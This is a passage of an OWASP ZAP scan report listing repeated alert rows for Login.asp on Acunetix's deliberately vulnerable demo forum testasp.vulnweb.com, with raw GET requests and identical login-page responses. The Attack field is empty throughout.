href="./Register.asp?RetURL=%2FSearch%2Easp%3F" class="menu">register</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 371 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/Search.asp?tfSearch=ZAP Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:33 GMT Content-Length: 3137 |
| Response Body - size: 3,137 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2FSearch%2Easp%3FtfSearch%3DZAP" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:25 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:29 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 361 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showforum.asp?id=2 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:31 GMT Content-Length: 3132 |
| Response Body - size: 3,132 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowforum%2Easp%3Fid%3D2" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=0 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:49 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D0" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 363 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=1 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:48 GMT Content-Length: 3133 |
| Response Body - size: 3,133 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D1" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=10 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:51 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D10" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=11 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
| Request Body - size: 0 bytes. |
|
| Response Header - size: 177 bytes. |
HTTP/1.1 200 OK
Cache-Control: private Content-Type: text/html Server: Microsoft-IIS/8.5 X-Powered-By: ASP.NET Date: Mon, 14 Mar 2022 07:52:52 GMT Content-Length: 3134 |
| Response Body - size: 3,134 bytes. |
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN" "http://www.w3.org/TR/html4/loose.dtd"> <html><!-- InstanceBegin template="/Templates/MainTemplate.dwt.asp" codeOutsideHTMLIsLocked="false" --> <head> <!-- InstanceBeginEditable name="doctitle" --> <title>acuforum login</title> <!-- InstanceEndEditable --> <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1"> <!-- InstanceBeginEditable name="head" --> <!-- InstanceEndEditable --> <link href="styles.css" rel="stylesheet" type="text/css"> </head> <body> <table width="100%" border="0" cellpadding="10" cellspacing="0"> <tr bgcolor="#008F00"> <td width="306px"><a href="https://www.acunetix.com/"><img src="Images/logo.gif" width="306" height="38" border="0" alt="Acunetix website security"></a></td> <td align="right" valign="middle" bgcolor="#008F00" class="disclaimer">TEST and Demonstration site for <a href="https://www.acunetix.com/vulnerability-scanner/">Acunetix Web Vulnerability Scanner</a></td> </tr> <tr> <td colspan="2"><div class="menubar"><a href="Templatize.asp?item=html/about.html" class="menu">about</a> - <a href="Default.asp" class="menu">forums</a> - <a href="Search.asp" class="menu">search</a> - <a href="./Logout.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D11" class="menu">logout ZAP</a> - <a href="https://www.acunetix.com/vulnerability-scanner/sql-injection/" class="menu">SQL scanner</a> - <a href="https://www.acunetix.com/websitesecurity/sql-injection/" class="menu">SQL vuln help</a> </div></td> </tr> <tr> <td colspan="2"><!-- InstanceBeginEditable name="MainContentLeft" --> <form action="" method="POST"> <table width="350" border="0" align="center" cellpadding="0" cellspacing="5" class="FramedForm"> <tr> <td>Username:</td> <td align="right"><input name="tfUName" type="text" class="Login" id="tfUName"></td> </tr> <tr> <td>Password:</td> <td align="right"><input name="tfUPass" type="password" class="Login" id="tfUPass"></td> </tr> <tr> <td> </td> <td align="right"><input type="submit" value="Login"></td> </tr> </table> </form> <!-- InstanceEndEditable --></td> </tr> <tr align="right" bgcolor="#FFFFFF"> <td colspan="2" class="footer">Copyright 2019 Acunetix Ltd.</td> </tr> </table> <div style="background-color:lightgray;width:80%;margin:auto;text-align:center;font-size:12px;padding:1px"> <p style="padding-left:20%;padding-right:20%"><b>Warning</b>: This forum is deliberately vulnerable to SQL Injections, directory traversal, and other web-based attacks. It is built using ASP and it is here to help you test Acunetix. The entire content of the forum is erased daily. All the posts are real-life examples of how attackers are trying to break into insecure web applications. Please be careful and do not follow links that are posted by malicious parties.</p> </div> </body> <!-- InstanceEnd --></html> |
| URL | http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 |
| Method | GET |
| Parameter | |
| Attack | |
| Evidence | private |
| Request Header - size: 365 bytes. |
GET http://testasp.vulnweb.com/Login.asp?RetURL=%2Fshowthread%2Easp%3Fid%3D12 HTTP/1.1
Host: testasp.vulnweb.com User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:92.0) Gecko/20100101 Firefox/92.0 Pragma: no-cache Cache-Control: no-cache Referer: http://testasp.vulnweb.com/showthread.asp?id=12 Cookie: ASPSESSIONIDCQRDQBRC=OJGCKBOCLKNALJCNHFKKFHOA |
